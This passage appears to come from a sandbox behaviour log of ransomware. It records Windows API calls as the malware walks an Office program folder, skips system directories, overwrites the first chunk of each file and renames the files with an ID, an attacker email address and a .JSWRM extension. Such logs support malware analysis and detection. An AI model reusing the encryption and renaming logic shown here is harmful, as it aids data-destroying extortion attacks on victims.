Office\\root\\Office16\\ACCWIZ\\ACWZDAT12.ACCDU" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzdat12.accdu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.840] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6316032) returned 1 [0122.840] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1d8 [0122.840] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0122.854] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.855] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0122.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.855] CloseHandle (hObject=0x238) returned 1 [0122.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0122.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0122.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0122.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0122.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0122.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0122.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.856] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZDAT12.ACCDU" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzdat12.accdu"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZDAT12.ACCDU.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzdat12.accdu.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0122.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0122.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0122.856] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x12a447be, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x12a447be, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1303a658, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1fe000, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ACWZLIB.ACCDE", cAlternateFileName="ACWZLI~1.ACC")) returned 1 [0122.856] lstrcmpiW (lpString1="ACWZLIB.ACCDE", lpString2=".") returned 1 [0122.857] lstrcmpiW (lpString1="ACWZLIB.ACCDE", lpString2="..") returned 1 [0122.857] lstrcmpiW (lpString1="ACWZLIB.ACCDE", lpString2="...") returned 1 [0122.857] lstrcmpiW (lpString1="ACWZLIB.ACCDE", lpString2="windows") returned -1 [0122.857] lstrcmpiW (lpString1="ACWZLIB.ACCDE", lpString2="recovery") returned -1 [0122.857] lstrcmpiW (lpString1="ACWZLIB.ACCDE", lpString2="perflogs") returned -1 [0122.857] lstrcmpiW (lpString1="ACWZLIB.ACCDE", lpString2="documents and settings") returned -1 [0122.857] lstrcmpiW (lpString1="ACWZLIB.ACCDE", lpString2="$RECYCLE.BIN") returned 1 [0122.857] lstrcmpiW (lpString1="ACWZLIB.ACCDE", lpString2="system volume information") returned -1 [0122.857] lstrcmpiW (lpString1="ACWZLIB.ACCDE", lpString2="msocache") returned -1 [0122.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0122.857] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACWZLIB.ACCDE", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.857] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACWZLIB.ACCDE", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACWZLIB.ACCDE", lpUsedDefaultChar=0x0) returned 13 [0122.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0122.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0122.857] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACWZLIB.ACCDE", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.857] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACWZLIB.ACCDE", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACWZLIB.ACCDE", lpUsedDefaultChar=0x0) returned 13 [0122.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0122.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0122.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0122.857] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.857] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0122.857] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZLIB.ACCDE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzlib.accde"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.858] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2088960) returned 1 [0122.858] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1d8 [0122.858] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0122.876] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.876] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0122.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.877] CloseHandle (hObject=0x238) returned 1 [0122.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0122.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0122.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0122.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0122.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0122.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0122.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0122.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0122.877] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZLIB.ACCDE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzlib.accde"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZLIB.ACCDE.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzlib.accde.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0122.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0122.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0122.878] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x12fc801f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x12fc801f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133f40a9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8d9000, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ACWZMAIN.ACCDE", cAlternateFileName="ACWZMA~1.ACC")) returned 1 [0122.878] lstrcmpiW (lpString1="ACWZMAIN.ACCDE", lpString2=".") returned 1 [0122.878] lstrcmpiW (lpString1="ACWZMAIN.ACCDE", lpString2="..") returned 1 [0122.878] lstrcmpiW (lpString1="ACWZMAIN.ACCDE", lpString2="...") returned 1 [0122.878] lstrcmpiW (lpString1="ACWZMAIN.ACCDE", lpString2="windows") returned -1 [0122.878] lstrcmpiW (lpString1="ACWZMAIN.ACCDE", lpString2="recovery") returned -1 [0122.878] lstrcmpiW (lpString1="ACWZMAIN.ACCDE", lpString2="perflogs") returned -1 [0122.878] lstrcmpiW (lpString1="ACWZMAIN.ACCDE", lpString2="documents and settings") returned -1 [0122.878] lstrcmpiW (lpString1="ACWZMAIN.ACCDE", lpString2="$RECYCLE.BIN") returned 1 [0122.878] lstrcmpiW (lpString1="ACWZMAIN.ACCDE", lpString2="system volume information") returned -1 [0122.878] lstrcmpiW (lpString1="ACWZMAIN.ACCDE", lpString2="msocache") returned -1 [0122.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0122.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACWZMAIN.ACCDE", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0122.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACWZMAIN.ACCDE", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACWZMAIN.ACCDE", lpUsedDefaultChar=0x0) returned 14 [0122.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0122.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0122.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACWZMAIN.ACCDE", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0122.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACWZMAIN.ACCDE", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACWZMAIN.ACCDE", lpUsedDefaultChar=0x0) returned 14 [0122.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0122.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0122.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0122.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0122.879] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZMAIN.ACCDE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzmain.accde"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.880] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9277440) returned 1 [0122.880] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1d8 [0122.880] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0122.893] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.893] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0122.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.894] CloseHandle (hObject=0x238) returned 1 [0122.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0122.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0122.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0122.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0122.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0122.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0122.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.894] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZMAIN.ACCDE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzmain.accde"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZMAIN.ACCDE.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwzmain.accde.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0122.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0122.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0122.895] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x13086ac2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x13086ac2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1335b74d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xaf6000, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ACWZTOOL.ACCDE", cAlternateFileName="ACWZTO~1.ACC")) returned 1 [0122.895] lstrcmpiW (lpString1="ACWZTOOL.ACCDE", lpString2=".") returned 1 [0122.895] lstrcmpiW (lpString1="ACWZTOOL.ACCDE", lpString2="..") returned 1 [0122.895] lstrcmpiW (lpString1="ACWZTOOL.ACCDE", lpString2="...") returned 1 [0122.895] lstrcmpiW (lpString1="ACWZTOOL.ACCDE", lpString2="windows") returned -1 [0122.895] lstrcmpiW (lpString1="ACWZTOOL.ACCDE", lpString2="recovery") returned -1 [0122.895] lstrcmpiW (lpString1="ACWZTOOL.ACCDE", lpString2="perflogs") returned -1 [0122.895] lstrcmpiW (lpString1="ACWZTOOL.ACCDE", lpString2="documents and settings") returned -1 [0122.895] lstrcmpiW (lpString1="ACWZTOOL.ACCDE", lpString2="$RECYCLE.BIN") returned 1 [0122.895] lstrcmpiW (lpString1="ACWZTOOL.ACCDE", lpString2="system volume information") returned -1 [0122.895] lstrcmpiW (lpString1="ACWZTOOL.ACCDE", lpString2="msocache") returned -1 [0122.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0122.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACWZTOOL.ACCDE", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0122.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACWZTOOL.ACCDE", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACWZTOOL.ACCDE", lpUsedDefaultChar=0x0) returned 14 [0122.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0122.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0122.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACWZTOOL.ACCDE", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0122.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACWZTOOL.ACCDE", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACWZTOOL.ACCDE", lpUsedDefaultChar=0x0) returned 14 [0122.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0122.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0122.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0122.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0122.896] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZTOOL.ACCDE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwztool.accde"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.897] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11493376) returned 1 [0122.897] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1d8 [0122.897] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0122.912] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.912] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0122.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.912] CloseHandle (hObject=0x238) returned 1 [0122.913] RtlAllocateHeap 